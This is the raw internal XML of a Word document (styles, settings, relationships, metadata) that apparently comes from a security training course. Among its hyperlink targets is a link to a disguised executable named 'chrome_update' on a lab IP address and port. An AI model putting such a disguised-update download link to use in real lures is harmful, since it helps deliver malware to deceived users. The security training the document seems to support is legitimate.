    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>
    <w:rsid w:val="00FF6A8D"/>
    <w:rsid w:val="00FF72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20C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0F4000-9F40-429C-9BC2-BB7BE132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53C"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7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7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7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7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7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7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7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7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7DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003725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5183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66155687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84351935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113333150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="225773250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255334294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298725559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="323627271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342245319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430781077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436802452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446391954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509413221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633870619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921795728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962350198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="978268902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123891222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1249465896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1307204444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1323658101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1382747297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1401176623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1426414117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454519065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472863769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1481920777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493372993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542010383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548449301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565290438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645311461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655986748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667316412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849327333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911769533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930655687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960603974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964994371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2005277599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045403283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214342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i@10.10.10.10" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.il" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.ex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10.10.10.10/multi"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1CFF0-FA6E-4519-BE82-00ECC628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23</Pages>
  <Words>6409</Words>
  <Characters>36536</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>304</Lines>
  <Paragraphs>85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SXC זסב</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SXC זסב</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
